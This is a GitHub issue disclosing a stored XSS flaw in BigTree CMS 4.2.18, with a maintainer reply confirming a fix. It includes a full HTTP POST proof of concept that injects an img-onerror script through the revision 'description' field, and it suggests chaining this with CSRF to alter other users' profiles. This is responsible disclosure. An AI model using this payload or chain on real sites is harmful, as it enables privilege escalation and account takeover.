Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cross-site Scripting (XSS) in bigtreecms 4.2.18
We can use low-privileged(administrator) users to attack high-privileged(Developer) users Combined with this csrf(http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/users/profile/update/), we can Modify any user profile
POC: 1、add a administrator user 222222 2、login with user 222222 3、request http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/,save a published revisions:
POST /BigTree-CMS-4.2.18/site/index.php/admin/ajax/pages/save-revision/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/ Content-Length: 163 Cookie: Connection: keep-alive id=c0&description=%22%3E%3Cimg+src%3D1+onerror%3Dalert(%2Fxss%2F)%3E&csrf_token_YCH2Q3YC6Y9RTA4D3T4KKNG80WAKCF88 =nZuaRAB4lBqfc9YHAERQAiA1z1N0F3j48sKEQPM4vvE%3D
POST /BigTree-CMS-4.2.18/site/index.php/admin/ajax/pages/save-revision/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/ Content-Length: 163 Cookie: Connection: keep-alive
id=c0&description=%22%3E%3Cimg+src%3D1+onerror%3Dalert(%2Fxss%2F)%3E&csrf_token_YCH2Q3YC6Y9RTA4D3T4KKNG80WAKCF88 =nZuaRAB4lBqfc9YHAERQAiA1z1N0F3j48sKEQPM4vvE%3D
the param description have a xss vuln 4、when the developer user login, and request: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/ the developer user will be xssed~
thank you~ email:xfkxfk@secbook.net
The text was updated successfully, but these errors were encountered:
Fixing unescaped description when saving a published revision. Thanks…
54f51b2
… xfkxfk! #294
Fixed! Thank you!
Sorry, something went wrong.
No branches or pull requests
Cross-site Scripting (XSS) in bigtreecms 4.2.18
We can use low-privileged(administrator) users to attack high-privileged(Developer) users
Combined with this csrf(http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/users/profile/update/), we can Modify any user profile
POC:
1、add a administrator user 222222
2、login with user 222222
3、request http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/,save a published revisions:
the param description have a xss vuln
4、when the developer user login, and request:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/
the developer user will be xssed~
thank you~
email:xfkxfk@secbook.net
The text was updated successfully, but these errors were encountered: